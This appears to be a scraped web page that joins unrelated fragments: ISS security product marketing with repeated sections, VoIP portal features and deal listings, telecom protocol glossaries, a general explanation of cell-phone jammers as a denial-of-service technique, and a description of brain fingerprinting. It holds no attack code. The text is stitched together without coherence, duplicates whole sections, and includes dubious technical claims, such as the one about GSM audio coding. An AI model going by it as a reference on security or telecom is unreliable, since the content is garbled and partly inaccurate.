keeping it up to date with the leading edge of hacking developments.
Exploit techniques used during our assessments are based on
vulnerability research performed by our renowned X-Force team, and
draw upon extensive security knowledge gathered by our Knowledge
Services.

Security Management Solutions

Security Management Solutions

ISS comprehensive security lifecycle methodology helps e-businesses
focus on their most important security management needs through
standards-based baseline assessments and a full line of consulting,
education and knowledge services offerings.
ISS security management experts work closely with organizations to
establish best-practices strategies for ongoing security management,
and provides outsourced managed security services (MSS). MSS turns a

potential security crisis into achievable security policy, reduced costs
and managed liability. MSS offerings include remote firewall, antivirus,
intrusion detection, PKI/VPN and other security management
essentials. Each installation is backed by ISS’ advanced, standardsbased
security lifecycle methodology, and can be paired with ecommerce
insurance for a complete e-business risk management
solution.

The ISS X-Force

X-Force is a senior research and development team of security experts
dedicated to understanding, documenting and coding new
vulnerabilities, attack signatures and global network security solutions.
X-Force professionals work closely with major hardware and software
vendors to uncover and correct potential security problems before they
are discovered and deployed as part of a malicious attack. This
information is regularly integrated into SAFEsuite products, customer
e-mail alerts, and the X-Force online vulnerability database.
Together, SAFEsuite products and the X-Force allow network
administrators to proactively visualize, measure, and analyze real-time
security vulnerabilities and minimize unnecessary exposures to risk.
For more information on the X-Force or to use the X-Force online
knowledge base, please visit the X-Force Web site at http://
xforce.iss.net

RealSecure

RealSecure

RealSecure™ is the industry's first integrated host and network-based
intrusion, misuse, and response system. RealSecure Engines
unobtrusively analyze network traffic, recognizing hostile activity by
interpreting network traffic patterns that indicate attacks. RealSecure
Agents reside on individual hosts, reviewing system logs for evidence
of unauthorized activity.
Upon recognizing a threat, RealSecure reacts immediately with a wide
range of possible responses that include automatically terminating the
connection, sending off alarms or pagers, and recording the attack for
forensic analysis. With RealSecure's distributed architecture and
integration with leading network management systems such as Tivoli
Enterprise and HP OpenView, customers can easily install and manage
RealSecure Engines and Agents throughout their enterprise to stop
internal misuse as well as attacks from outside the network perimeter.

SAFEsuite Decisions

SAFEsuite Decisions is the initial product in a series of new SAFEsuite
Enterprise applications from ISS. It is the first enterprise security
decision-support product that delivers prioritized cross-product
security information to a central location, enabling decision-makers to
take immediate action for ongoing information protection. SAFEsuite
Decisions pulls information from all ISS products, as well as third party
security products, such as firewalls, and provides customers with the
power to quickly understand the state of their security across the
enterprise.

ISS Products

ISS Products

ISS’ award-winning SAFEsuite product line includes:
• Risk Assessment: Internet Scanner, System Scanner, and Database
Scanner
• Intrusion Detection: RealSecure
• Enterprise Security Decision-Support: SAFEsuite Decisions
Internet Scanner
Internet Scanner™ is the market-leading solution for quickly finding
and fixing security holes through automated and comprehensive
network security risk assessment. Internet Scanner scans network
devices to detect vulnerabilities, prioritizes security risks and generates
a wide range of reports ranging from executive-level analysis to
detailed step-by-step instructions for prioritizing and eliminating
security risks.

System Scanner

System Scanner™ is a leading host-based risk assessment and policy
management system. System Scanner helps organizations manage
critical server and enterprise desktop security risks by thoroughly
analyzing internal operating system weaknesses and user activity.
System Scanner also compares an organization's stated security policy
with the actual configuration of the host computer for potential security
risks, including easily guessed passwords, user privileges, file system
access rights, service configurations, and other suspicious activities that
indicate an intrusion.

Database Scanner

ISS' Database Scanner™ is the first risk assessment product engineered
specifically for protecting database applications through security policy
creation, compliance, and enforcement. Database Scanner
automatically identifies potential security exposures in database
systems, ranging from weak passwords to dangerous backdoor
programs.

ISS Products

ISS Products

ISS’ award-winning SAFEsuite product line includes:
• Risk Assessment: Internet Scanner, System Scanner, and Database
Scanner
• Intrusion Detection: RealSecure
• Enterprise Security Decision-Support: SAFEsuite Decisions
Internet Scanner
Internet Scanner™ is the market-leading solution for quickly finding
and fixing security holes through automated and comprehensive
network security risk assessment. Internet Scanner scans network
devices to detect vulnerabilities, prioritizes security risks and generates
a wide range of reports ranging from executive-level analysis to
detailed step-by-step instructions for prioritizing and eliminating
security risks.

System Scanner

System Scanner™ is a leading host-based risk assessment and policy
management system. System Scanner helps organizations manage
critical server and enterprise desktop security risks by thoroughly
analyzing internal operating system weaknesses and user activity.
System Scanner also compares an organization's stated security policy
with the actual configuration of the host computer for potential security
risks, including easily guessed passwords, user privileges, file system
access rights, service configurations, and other suspicious activities that
indicate an intrusion.

Database Scanner

ISS' Database Scanner™ is the first risk assessment product engineered
specifically for protecting database applications through security policy
creation, compliance, and enforcement. Database Scanner
automatically identifies potential security exposures in database
systems, ranging from weak passwords to dangerous backdoor
programs.

About Internet Security Systems

About Internet Security Systems

How ISS Started

In 1992, Christopher Klaus, a then 19 year-old college student and

computer science guru, invented a ground-breaking technology based

on the need for a security technology that could actively identify and

fix network security weaknesses.

After a tremendous response and continued demand for this new

technology, Christopher founded Internet Security Systems in 1994,

and teamed with software veteran, ISS President and Chief Executive

Officer, Thomas E. Noonan, to launch the company’s first official

commercial product, Internet Scanner™. Today, Internet Scanner

remains a core component of the ISS SAFEsuite product family and the

industry standard for automated security assessment and analysis.

Together, Christopher Klaus and Thomas Noonan launched a company

that would continue on an impressive path of success making an

elegant transition from a private start up to a leading public company

credited with pioneering and leading the field of security management.

Headquartered in Atlanta, Ga., ISS has established a strong global

presence with additional offices throughout North America and

international operations throughout Asia, Australia, Europe, and Latin

America.

Company Growth

ISS has experienced tremendous growth and market acceptance with

more than 1000 employees and over 5,000 customers including 21 of the

25 largest U.S. commercial banks, 9 of the top 10 telecommunications

companies, 68 percent of the Fortune 50, and more than 35 government

agencies worldwide. ISS SAFEsuite solutions play an integral role in

the information protection strategies of leading companies and

organizations in the financial services, technology,

telecommunications, manufacturing, health care and government and

services industries.

Web Portal Features

Call History

Call History gives you a real-time list of all incoming, missed or outgoing calls for all employees on your network. The list also offers the ability to make and return a VoIP call with one click of the mouse, make call notes, read faxes, and listen to voicemails and call recordings.

Call Notes

Make notations of any VoIP calls for future reference.

Click-to-Call In

Allows you to create a link on your website that provides viewers with the option of calling you directly with one click.

Contact Management

Online directory to manage contacts and addresses or initiate a call with one click. Account manager can use this directory to monitor and manage individual user settings and information.

Reporting

Got2VoIP’s service creates history reports of all individual and departmental usage. These can be redistributed to employees. Speed Dial and Company Directory Phone Integration Allows you to access your company directory and quick dial directly from the phone.

User Dashboard

Our web-based dashboard provides all the information you need; missed phone, voicemail, fax messages, active call display, and access to the company directory and personal contacts for click-to-call. Available on any PC or laptop with Internet capabilities.

Voicemail and Fax Notifications

Be notified of new voice messages through email or SMS.

Website Widgets

Website Widgets are elements that can be embedded into your website to give added functionality to users. They are designed to direct traffic flow from your website directly to one of your VoIP extensions or departments.

VoIP business solutions - VoIP phones and connection buying guide

VoIP business solutions - VoIP phones and connection buying guide

• Best Buy VoIP offers for Christmas
  Buying VoIP phones on any day is a saving on your telephone bills but buying on Christmas is a bonus as most VoIP providers are offering lucrative deals for Christmas and New Year. You can search on...
• Win an iPad 2 contest - JustDial
  Hello friends, JustDial has been organising a contest since February 2012 where the have been giving away an iPad 2 everyday to a winner from India. I hope you will also enroll yourself in the...
• How to convert iPhone 5 into Voip Phone?
  As iPhone 5 is being released worldwide and over 2 million handsets sold in first 24 hours, I was wondering whether we can convert our iPhone 5 into VOIP phone to make free calls. After going through...
• Rs. 380 for a Smartphone - Best Deal on Samsung Galaxy Y S5360
  If you are searching to buy Samsung Galaxy Y S5360 phone online, then you have landed on the right page. Today, I am bidding to win a Samsung Galaxy Y S5360 at a new site that has rocked Indians...
• Best Deal on Samsung Galaxy Smartphone
  This is a never before offer only for my online friends. Try your luck and get your smartphone at an unbelievable price tag, i.e., Rs. 380, nothing better than that. Enjoy. Rs. 380 for a...
• Bid and win Samsung Galaxy Y S5360 mobile phone
  Samsung Galaxy Y S5360 mobile phone at dealite.in. All you have to do is go and bid at this site, visit this page After registration, go ahead and buy bids for this phone. There are all types...
• IP Telephony Vs Public Switched Telephone Network
  Looking back at the public switched telephone network, which until now has roughly an access network including the wiring from the subscriber's home to the local exchanges and the necessary...
• Voip Bandwidth Consumption
  Bandwidth Consumption in Voip: Achieving high quality carry voice over IP telephone in real time is not an easy task to achieve because such work requires management capabilities that allow network..

protocol's

ROUTER is a complex program running on a computer, a physical device, which forwards data packets over a WAN or LAN to another. Based on routing protocols, a router reads destination network addresses of each packet, which arrives to its server and then decides on sending them via the best route possible which is based on cost, traffic load, speed, and other factors. Routers usually work at third level of protocol stack, while switches and bridges work at second level of protocol stack.

VOICE OVER ATM enables a router to carry calls and faxes and other voice traffic over an Asynchronous Transfer Mode network. Voice traffic over Asynchronous Transfer Mode network is encapsulated via a special method for multiplexed voice.

WIDE AREA NETWORK or WAN communications network is used to connect computers and other communication devices using public or private connections.

Protocol's

H.323 PROTOCOL is an overall recommendation that includes references to other network standards like H.225 and H.245 of ITU (International Telecommunication Union), which sets network standards for multimedia communications over packet-based networks that are not able to provide a guaranteed good Quality of Service (QoS).

H.323 PROTOCOL defines various entities, which make possible media and multimedia communications using endpoints, multipoint conferencing units or MCUs, gatekeepers, and gateways and their interaction.

PBX or PRIVATE BRANCH EXCHANGE is a specialized telephone system, which is used in both private and governmental organizations and companies to manage external and internal calls. Advantage of PBX is that the organization using it does not requires a different phone line for each of their phones and internal calls do not go outside and are not billed.

PULSE CODE MODULATION or PCM converts sound or voice analog signals into digital signals, so that these signals can be processed easily by a digital device, for example, a computer. You also need to use a codec if you want to compress the results for transmissions to occupy lowest possible bandwidth.

Wireless Communication Protocols: GSM, H.323, PBX, PCM, WAN, LAN, Routers

Wireless Communication Protocols: GSM, H.323, PBX, PCM, WAN, LAN, Routers

  GSM or GLOBAL SYSTEM FOR MOBILE COMMUNICATIONS is a digital cellphone technology that is based on TDMA (Time Division Multiple Access) and is predominantly used in European countries and it is also used in other countries of the world including India. GSM was developed in the 1980s and was distributed to be used in around 7 European countries in 1992. Nowadays, GSM is used in Asia, Europe, Australia, North America, and Chile. GSM operates on 1.9GHz PCS bands in USA and 900MHz and 1.8GHz bands in Europe. Global System for Mobile Communications defines the entire mobile system and is not just used as a radio interface but also TDMA and CDMA which is Code Division Multiple Access. In the year 2000, world had more than 250 million GSM users which represents more than half of world’s population of cellphone users. GSM use is increasing day by day due to its reliability and easy connectivity services. WAV and AIFF files are used for audio coding of the GSM standard used in IP telephony.

Type “B” Device: INTELLIGENT CELLULAR DISABLERS

Type “B” Device: INTELLIGENT CELLULAR DISABLERS

Unlike jammers, Type “B” devices do not transmit an interfering signal on the control channels. The device, when located in a designated ‘quiet' area, functions as a ‘detector'. It has a unique identification number for communicating with the cellular base station. When a Type “B” device detects the presence of a mobile phone in the quiet room; the ‘filtering' (i.e. the prevention of authorization of call establishment) is done by the software at the base station.
When the base station sends the signaling transmission to a target user, the device after detecting simultaneously the presence of that signal and the presence of the target user, signals the base station that the target user is in a ‘quiet' room; therefore, do not establish the communication. Messages can be routed to the user's voice- mail box, if the user subscribes to a voice-mail service. This process of detection and interruption of call establishment is done during the interval normally reserved for signaling and handshaking. For ‘emergency users', the intelligent detector device makes provisions for designated users who have emergency status. These users must pre-register their phone numbers with the service providers. When an incoming call arrives, the detector recognizes that number and the call are established for a specified maximum duration, say two minutes. The emergency users are also allowed to make out going calls. Similarly, the system is capable of recognizing and allowing all emergency calls routed to “911”.
It should be noted that the Type “B” detector device being an integral part of the cellular/PCS systems, would need to be provisioned by the cellular/PCS service providers or provisioned by a third-party working cooperatively with full support of the cellular/PCS service providers.

Type "A" Device: JAMMERS :

Type "A" Device: JAMMERS :

In this device we overpower cell phone's signal with a stronger signal, This type of device comes equipped with several independent oscillators transmitting ‘jamming signals' capable of blocking frequencies used by paging devices as well as those used by cellular/PCS systems' control channels for call establishment. When active in a designated area, such devices will (by means of RF interference) prevent all pagers and mobile phones located in that area from receiving and transmitting calls. This type of device transmits only a jamming signal and has very poor frequency selectivity, which leads to interference with a larger amount of communication spectrum than it was originally intended to target. Technologist Jim Mahan said, “There are two types. One is called brute force jamming, which just blocks everything. The problem is, it's like power-washing the airwaves and it bleeds over into the public broadcast area. The other puts out a small amount of interference, and you could potentially confine it within a single cell block. You could use lots of little pockets of small jamming to keep a facility under control.”

Introduction of Mobile Jammer

Introduction of Mobile Jammer

Jamming devices overpower the cell phone by transmitting a signal on the same frequency as the cell phone and at a high enough power that the two signals collide and cancel each other out. Cell phones are designed to add power if they experience low-level interference, so the jammer must recognize and match the power increase from the phone. Cell phones are full-duplex devices, which mean they use two separate frequencies, one for talking and one for listening simultaneously. Some jammers block only one of the frequencies used by cell phones, which has the effect of blocking both. The phone is tricked into thinking there is no service because it can receive only one of the frequencies. Less complex devices block only one group of frequencies, while sophisticated jammers can block several types of networks at once to head off dual-mode or tri-mode phones that automatically switch among different network types to find an open signal. Some of the high-end devices block all frequencies at once and others can be tuned to specific frequencies.
To jam a cell phone, all you need is a device that broadcasts on the correct frequencies. Although different cellular systems process signals differently, all cell-phone networks use radio signals that can be interrupted. GSM, used in digital cellular and PCS-based systems, operates in the 900-MHz and 1800-MHz bands in Europe and Asia and in the 1900-MHz (sometimes referred to as 1.9-GHz) band in the United States. Jammers can broadcast on any frequency and are effective against AMPS, CDMA, TDMA, GSM, PCS, DCS, iDEN and Nextel systems. Old-fashioned analog cell phones and today's digital devices are equally susceptible to jamming. Disrupting a cell phone is the same as jamming any other type of radio communication. A cell phone works by communicating with its service network through a cell tower or base station. Cell towers divide a city into small areas, or cells. As a cell phone user drives down the street, the signal is handed from tower to tower

A jamming device transmits on the same radio frequencies as the cell phone, disrupting the communication between the phone and the cell-phone base station in the town

It's a called a denial-of-service attack . The jammer denies service of the radio spectrum to the cell-phone users within range of the jamming device. Older jammers sometimes were
limited to working on phones using only analog or older digital mobile phone standards. Newer models such as the double and triple band jammers can block all widely used systems (AMPS, iDEN, GSM, etc) and are even very effective against newer phones which hop to different frequencies and systems when interfered with. As the dominant network technology and frequencies used for mobile phones vary worldwide, some work only in specific regions such as Europe or North America.
The power of the jammer's effect can vary widely based on factors such as proximity to towers, indoor and outdoor settings, presence of buildings and landscape, even temperature and humidity play a role. There are concerns that crudely designed jammers may disrupt the functioning of medical devices such as pacemakers. However, like cell phones, most of the devices in common use operate at low enough power output (<1W) to avoid causing any problems

Mobile Jammer

Mobile Jammer

A GSM Jammer or cell phone jammer is a device that transmit signal on the same frequency at which the GSM system operates, the jamsming success when the mobile phones in the area where the jammer is located are disabled.
Communication jamming devices were first developed and used by military. Where tactical commanders use RF communications to exercise control of their forces, an enemy has interest in those communications. This interest comes from the fundamental area of denying the successful transport of the information from the sender to the receiver.
Nowadays the mobile jammer devices or cell phone jammer software are becoming civilian products rather than electronic warfare devices, since with the increasing number of the mobile phone users the need to disable mobile phones in specific places where the ringing of cell phone would be disruptive has increased. These places include worship places, university lecture rooms, libraries, concert halls, meeting rooms, and other places where silence is appreciated

Technique:

Technique:

The person to be tested wears a special headband with electronic sensors that measure the electroencephalography from several locations on the scalp. In order to calibrate the brain fingerprinting system, the testee is presented with a series of irrelevant stimuli, words, and pictures, and a series of relevant stimuli, words, and pictures. The test subject's brain response to these two different types of stimuli allow the testor to determine if the measured brain responses to test stimuli, called probes, are more similar to the relevant or irrelevant responses.

The technique uses the well known fact that an electrical signal known as P300 is emitted from an individual's brain approximately 300 milliseconds after it is confronted with a stimulus of special significance, e.g. a rare vs. a common stimuls or a stimulas the proband is asked to count. The novel interpretation in brain fingerprinting is to look for P300 as response to stimuli related to the crime in question e.g., a murder weapon or a victim's face. Because it is based on EEG signals, the system does not require the testee to issue verbal responses to questions or stimuli.

Brain fingerprinting uses cognitive brain responses, brain fingerprinting does not depend on the emotions of the subject, nor is it affected by emotional responses. Brain fingerprinting is fundamentally different from the polygraph (lie-detector), which measures emotion-based physiological signals such as heart rate, sweating, and blood pressure. Also, unlike polygraph testing, it does not attempt to determine whether or not the subject is lying or telling the truth.

Brain Fingerprinting

Brain Fingerprinting

Brain Fingerprinting is designed to determine whether an individual recognizes specific information related to an event or activity by measuring electrical brain wave responses to words, phrases, or pictures presented on a computer screen.  The technique can be applied only in situations where investigators have a sufficient amount of specific information about an event or activity that would be known only to the perpetrator and investigator.  In this respect, Brain Fingerprinting is considered a type of Guilty Knowledge Test, where the "guilty" party is expected to react strongly to the relevant detail of the event of activity.  

Existing (polygraph) procedures for assessing the validity of a suspect's "guilty" knowledge rely on measurement of autonomic arousal (e.g., palm sweating and heart rate), while Brain Fingerprinting measures electrical brain activity via a fitted headband containing special sensors.  Brain Fingerprinting is said to be more accurate in detecting "guilty" knowledge distinct from the false positives of traditional polygraph methods, but this is hotly disputed by specialized researchers.